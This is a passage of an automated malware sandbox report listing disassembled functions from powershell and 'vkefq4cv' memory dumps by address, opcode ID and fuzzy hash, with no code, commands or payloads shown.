                                                                                                      Function 07902190 Relevance: 7.6, Strings: 6, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Tc<k$lc<k$JJl$JJl$JJl$JJl
                                                                                                      • API String ID: 0-3030476618
                                                                                                      • Opcode ID: dfc998cfc9c1b53be4f1c6716cf878974359fb42b98a2a0dca34987e8fa57018
                                                                                                      • Instruction ID: ca8cb18de45b8d023cc54f65643a51d0062b8efce91d4be71eb7a1a43c7a5b72
                                                                                                      • Opcode Fuzzy Hash: dfc998cfc9c1b53be4f1c6716cf878974359fb42b98a2a0dca34987e8fa57018
                                                                                                      • Instruction Fuzzy Hash: 1C1166B1A1C3918FC715C7A84C16E67BF687BE2304B1544ABC1008F6E5C9308D46C3E3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57A21 Relevance: 6.5, Strings: 5, Instructions: 244COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: tMIl$`_q$`_q$`_q$`_q
                                                                                                      • API String ID: 0-3706764884
                                                                                                      • Opcode ID: 6eaf12a33d2579e7459f37117879379a40fb2bc1650253b725b4e4bcaa7f87cb
                                                                                                      • Instruction ID: 99b418379dc41d3df9bb901226d06928dbb461f732c0776403eec9594ce9d270
                                                                                                      • Opcode Fuzzy Hash: 6eaf12a33d2579e7459f37117879379a40fb2bc1650253b725b4e4bcaa7f87cb
                                                                                                      • Instruction Fuzzy Hash: D7B1C974E002099FDB55DFA9D980A9EFBF2FF48304F108629D919AB315DB30A945CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: tMIl$`_q$`_q$`_q$`_q
                                                                                                      • API String ID: 0-3706764884
                                                                                                      • Opcode ID: 58aa3c0e75130197208b33fc800490e9becb87d21b912a824ed90bfca5a592e3
                                                                                                      • Instruction ID: 030ff5eae43694490ac4ba8e94d843ac2a7f57a959df8d15f7cb8576f98a8f69
                                                                                                      • Opcode Fuzzy Hash: 58aa3c0e75130197208b33fc800490e9becb87d21b912a824ed90bfca5a592e3
                                                                                                      • Instruction Fuzzy Hash: 82B19874E012099FDB54DFA9D590A9EFBF2FF48304F108629D919AB314EB70A945CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57200 Relevance: 6.5, Strings: 5, Instructions: 211COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: tMIl$`_q$`_q$`_q$`_q
                                                                                                      • API String ID: 0-3706764884
                                                                                                      • Opcode ID: 947c1ad6c5cbf879b16f4cbfb8dbac188c471f722cbe5e2d2cfb99019b402627
                                                                                                      • Instruction ID: 87e7b67cfb97c16e00a9d2ac6c426e9cfd823314365bdf98f80ffb0d056927db
                                                                                                      • Opcode Fuzzy Hash: 947c1ad6c5cbf879b16f4cbfb8dbac188c471f722cbe5e2d2cfb99019b402627
                                                                                                      • Instruction Fuzzy Hash: 77A19574E012099FDB54DFA9D990A9DFBF2FF48300F10862AD919AB315EB70A945CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07902270 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: JJl$JJl$JJl$JJl
                                                                                                      • API String ID: 0-4033152340
                                                                                                      • Opcode ID: 190a231ad7617ca2133423f204d9a12717880e9a5e43410714f014836111aa02
                                                                                                      • Instruction ID: 086eae54e41100ca798073d8c3e1403946e3fa2a5da00369846aa17e85d69cff
                                                                                                      • Opcode Fuzzy Hash: 190a231ad7617ca2133423f204d9a12717880e9a5e43410714f014836111aa02
                                                                                                      • Instruction Fuzzy Hash: 76413AF1924355DFCB298F68800DA6A7BB9BF42718F1880A7D4148B2D1C735C984CBE2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07901BE0 Relevance: 5.1, Strings: 4, Instructions: 107COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$rIl$rIl
                                                                                                      • API String ID: 0-4018539593
                                                                                                      • Opcode ID: 47ab14ef7e2af37f8e3ecae138ae43ce696841e8d6c019777c9c81d186e64914
                                                                                                      • Instruction ID: b411d23abc550924bfe1304f1d69b8ea21a93f1234a4dbf8548d4bd2fe002d86
                                                                                                      • Opcode Fuzzy Hash: 47ab14ef7e2af37f8e3ecae138ae43ce696841e8d6c019777c9c81d186e64914
                                                                                                      • Instruction Fuzzy Hash: C631D3B0B942198FCB19CB6894046AEBBF6AF86325F14847FD415CB2A5DB31C885CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07905798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                      • API String ID: 0-2125118731
                                                                                                      • Opcode ID: 3b38f75c74aabf954ed072ccde41d29753b4ff96cd1a971fa79cdc60a4b8e371
                                                                                                      • Instruction ID: d5d996ec1b9669c110ac7d367f91cc73bc31d9e74dcc51917345f44164fc5a93
                                                                                                      • Opcode Fuzzy Hash: 3b38f75c74aabf954ed072ccde41d29753b4ff96cd1a971fa79cdc60a4b8e371
                                                                                                      • Instruction Fuzzy Hash: 6C2149B172020A9FDB34552A8804F27BBDE5BC1718F25843AAE05CF3D5DD76C8518BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07900308 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                      • API String ID: 0-2049395529
                                                                                                      • Opcode ID: 942e5138bda4cd6ddd65b17cc1dbf3c9d856c9c57f8554c0df23f08049237c64
                                                                                                      • Instruction ID: f83c5c097c5d06f0b93718a3193b0cdff601ec73dfc76b98463ab1229595fa27
                                                                                                      • Opcode Fuzzy Hash: 942e5138bda4cd6ddd65b17cc1dbf3c9d856c9c57f8554c0df23f08049237c64
                                                                                                      • Instruction Fuzzy Hash: 51012860B6A3964FC72B062C1820B756FB65FC391472944EBC084CF29ACE154C4987E3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B9A2B4C Relevance: 1.4, Instructions: 1381COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9615ab97b7b44b851275588cd7975366735c2a1c033b0a2599be38aaf63ac047
                                                                                                      • Instruction ID: a02ab0f8d7adceb5f3ef927a24f0f496a46740bc17f6477e0e5edab0c1e0a977
                                                                                                      • Opcode Fuzzy Hash: 9615ab97b7b44b851275588cd7975366735c2a1c033b0a2599be38aaf63ac047
                                                                                                      • Instruction Fuzzy Hash: 4792A27071D94D5FDB95EF68C8A5AB93BE1FF59314B1501B9E44ECB2A6CE28E801C700
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A5133 Relevance: .1, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 43fe963c1ed01d5f4892c9f95f383fbada5176fdfdf63af62a63e37c8b32715a
                                                                                                      • Instruction ID: 53f095e8475602cb9da801cdf0e57d7509ad52015a069c53432a638d0a9e38b0
                                                                                                      • Opcode Fuzzy Hash: 43fe963c1ed01d5f4892c9f95f383fbada5176fdfdf63af62a63e37c8b32715a
                                                                                                      • Instruction Fuzzy Hash: A121E930A0551C9FDBA5EB28C461AE8B3B1EF4A305F5154B9D00DD7296CE3AAE81CB05
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A06D1 Relevance: 6.4, Strings: 5, Instructions: 174COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^=$L_^>$L_^?$L_^@$_
                                                                                                      • API String ID: 0-3213346487
                                                                                                      • Opcode ID: 8d64d95890c44506d2f51ed1d47e77c34ea9ba9da510127119b8bdb8b3c87d5c
                                                                                                      • Instruction ID: 85241ccfb2482203acc383058ce0bea422c41cb81a42ef4958198c6b3c5beeb5
                                                                                                      • Opcode Fuzzy Hash: 8d64d95890c44506d2f51ed1d47e77c34ea9ba9da510127119b8bdb8b3c87d5c
                                                                                                      • Instruction Fuzzy Hash: 764147B77182591ED3157BBCB8619DE3B60DB81370F0508B7D299CA0A3DE24208ECBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A07FA Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: _
                                                                                                      • API String ID: 0-701932520
                                                                                                      • Opcode ID: f31d893a01fac162650d86e09d71e80bd1fe4959bb052a591a1f69972d1d3eda
                                                                                                      • Instruction ID: 30e1ab642dc79289030baee984c68c784aaa88280c463c1812c6edc3c42852ed
                                                                                                      • Opcode Fuzzy Hash: f31d893a01fac162650d86e09d71e80bd1fe4959bb052a591a1f69972d1d3eda
                                                                                                      • Instruction Fuzzy Hash: D22138677082995ED31677ACF8215DE7B60EFC2371F11047BC288CE0A3DA24458EC7A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A2D87 Relevance: .3, Instructions: 345COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 35a8ef677b8b147234f11e0af92383321c23dcaf621bd2772e34614e703279af
                                                                                                      • Instruction ID: 47d6955468260c7f584ce11b642b12b7e2fba990756e768b2cf1d3779fe5c9b2
                                                                                                      • Opcode Fuzzy Hash: 35a8ef677b8b147234f11e0af92383321c23dcaf621bd2772e34614e703279af
                                                                                                      • Instruction Fuzzy Hash: AFB1B33071DA8D9FDBA5EFACC8A4AA53BE1FF59300F1501B9E44DC71A6CA25E846C700
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A1408 Relevance: .2, Instructions: 249COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d882166608b94e8c9a30e795554ebd7eb739d6b389621a51a051748c7a246d04
                                                                                                      • Instruction ID: 84aa3fe7f055fb70755546e9ef75cc23a4efa80e6f68b81e4eb87a494570fbfc
                                                                                                      • Opcode Fuzzy Hash: d882166608b94e8c9a30e795554ebd7eb739d6b389621a51a051748c7a246d04
                                                                                                      • Instruction Fuzzy Hash: 86818E3171994E9FDBA4EF9CC4A4AB937E1FF69300F1501B9E44EC72A1CA25E841CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A3EDE Relevance: .2, Instructions: 189COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3ef00037a0cd170b9fea3e26ac62e53d1a1d110cc5a321939744c4207f3e4aba
                                                                                                      • Instruction ID: 26f8c143bcc6d3a9ed79e4e5ea280e61caed0f3b5b3cc6417ecc305032e01bb4
                                                                                                      • Opcode Fuzzy Hash: 3ef00037a0cd170b9fea3e26ac62e53d1a1d110cc5a321939744c4207f3e4aba
                                                                                                      • Instruction Fuzzy Hash: 3671F170E1A65A9FD799DFB488653E9BBF0EF45310F1104BED00A9B3E1CA781945CB11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A18AA Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 42744afe36d67e3b0dad17a5363fd575ad77cba2402bd506fa5bc12f700cbb23
                                                                                                      • Instruction ID: 04cf7c55e726a11343ad68f172b580af16b3d9cbc2c1dc9a2d2ecf00cc326357
                                                                                                      • Opcode Fuzzy Hash: 42744afe36d67e3b0dad17a5363fd575ad77cba2402bd506fa5bc12f700cbb23
                                                                                                      • Instruction Fuzzy Hash: 3E41B171E1969D9FEB58DFA898A53EDBBF1EF45300F1400BED049E32A2CA741941CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4930 Relevance: .1, Instructions: 108COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: be39decb4412f77197896cc217462b7ae284b3bdc5e4b70bfb2031004d68de24
                                                                                                      • Instruction ID: 0c26706889488fb27206ffe6302eedc103cc44245378e6c6e8ac583131c4aa16
                                                                                                      • Opcode Fuzzy Hash: be39decb4412f77197896cc217462b7ae284b3bdc5e4b70bfb2031004d68de24
                                                                                                      • Instruction Fuzzy Hash: 5131E570D19A1D9FDB54EFA8C898BEDBBF1FF19301F1100699009E72A5DA785980CB01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4D48 Relevance: .1, Instructions: 97COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 166062cdd98293249228259c2d780c159764cc7f12eb20e541a9b7482f1e9201
                                                                                                      • Instruction ID: cfdc65850842468a32187a7fc69d1979ba572cdd142fd42449ba2d8c8a432de4
                                                                                                      • Opcode Fuzzy Hash: 166062cdd98293249228259c2d780c159764cc7f12eb20e541a9b7482f1e9201
                                                                                                      • Instruction Fuzzy Hash: 45311970E19A1D8FEBA8DB5888A4BA8B7F1FF58300F5141AAC00DE7295CB746D81CB01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4B99 Relevance: .1, Instructions: 92COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bacedffe5d7f3ef36fa8e8a23430fbc61e5f577892bc7faaceec8cdf61896394
                                                                                                      • Instruction ID: c7a3d38fb01986be6b1ff9729413bfea3cc5f199bc331fdab1be1600ff99d028
                                                                                                      • Opcode Fuzzy Hash: bacedffe5d7f3ef36fa8e8a23430fbc61e5f577892bc7faaceec8cdf61896394
                                                                                                      • Instruction Fuzzy Hash: 41316931E1961D8FDB94EFA4C8A57EDBBB0FF15311F4140AAD049E32A1CA386A85CF10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4D71 Relevance: .1, Instructions: 91COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 738832f8ecb257bdb257fcc7f533f5794688aeb9643d595d50d7fff1e59b9a68
                                                                                                      • Instruction ID: 6af24f206b17d1ccde00a27effebbdeaaf8d3a30ad408838e9d5a159a934bb1f
                                                                                                      • Opcode Fuzzy Hash: 738832f8ecb257bdb257fcc7f533f5794688aeb9643d595d50d7fff1e59b9a68
                                                                                                      • Instruction Fuzzy Hash: F331F870E15A5D8FEB98EBA88895BA8BBF1FF58300F1141AAC00DE7295CA745D81CB01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4006 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d0e6bfbbb2e331932102d212d8a59c4d2045335c4cd5e7b35df1189514d7d127
                                                                                                      • Instruction ID: accef07474c9168772c8e075f28b617bf93028f78bbeb1a79b8a1ebb22363f86
                                                                                                      • Opcode Fuzzy Hash: d0e6bfbbb2e331932102d212d8a59c4d2045335c4cd5e7b35df1189514d7d127
                                                                                                      • Instruction Fuzzy Hash: 8931B270D1A25A9FC7A9DBB488657F9BBE0EF45310F0105BDD00AAB3E1DA781945CB11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4CE9 Relevance: .1, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d73d43fa83b306d6358e824926678154d1851c4a6a50ff764b0e0fd0a6a12f4b
                                                                                                      • Instruction ID: 74819076c7a194e5209ed282c16d8c9261903f240252ba027ce377bd82b51723
                                                                                                      • Opcode Fuzzy Hash: d73d43fa83b306d6358e824926678154d1851c4a6a50ff764b0e0fd0a6a12f4b
                                                                                                      • Instruction Fuzzy Hash: 80212271A2A64D9FEB559FA488613ECBFE0FF45320F02007EC4499B192CA695989CB11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A464A Relevance: .1, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de7eb006aa9c1390bd2ac297c7cd1e1d9829658b93d5276640b520e59356c0bb
                                                                                                      • Instruction ID: a907a15ce43d2d0e309df2bf0af10617e32dc8b6c3cc3535eaced7a8c396e409
                                                                                                      • Opcode Fuzzy Hash: de7eb006aa9c1390bd2ac297c7cd1e1d9829658b93d5276640b520e59356c0bb
                                                                                                      • Instruction Fuzzy Hash: 8321CF3194E68D9FD7069BB494256E9BFF0EF42310F0140BAE04AD31A3CA6D5649C752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A0A66 Relevance: .1, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d9a1b42c4f1f0f6ad03d5cedaa4d6b36eb63ca6bdeb943661a22215425352a48
                                                                                                      • Instruction ID: e5d9f4e9ef2b20c7b267554c0deed1fe87b91df32ac30ee6fb471b29d75e6492
                                                                                                      • Opcode Fuzzy Hash: d9a1b42c4f1f0f6ad03d5cedaa4d6b36eb63ca6bdeb943661a22215425352a48
                                                                                                      • Instruction Fuzzy Hash: F621D86166EB866FC3469BB8442A1E9BFE0EF4623071744FDC045CB2B6DA9C0C07C711
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4637 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7c3d418ec049ab2c5d40f35759e59a1e7c3e2955896f97f70e5fe72b59f13b28
                                                                                                      • Instruction ID: 695931f2bc4f047c829752b003beb407b58d464a56fc284fab8b33eec4178bff
                                                                                                      • Opcode Fuzzy Hash: 7c3d418ec049ab2c5d40f35759e59a1e7c3e2955896f97f70e5fe72b59f13b28
                                                                                                      • Instruction Fuzzy Hash: 85113231A4E68C8FD7129BA0A8216E9BFB0EF82320F0241BBD049D71A3CA6C5518C752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A19B3 Relevance: .1, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3b25d3bf0ddb2140e2d0c637f0e8e89d45c1fc243be8155e61079615ce94062a
                                                                                                      • Instruction ID: a52e0a4d1db18b060218aaeb94231b05f9b88dcb38d41044561734a6897e6494
                                                                                                      • Opcode Fuzzy Hash: 3b25d3bf0ddb2140e2d0c637f0e8e89d45c1fc243be8155e61079615ce94062a
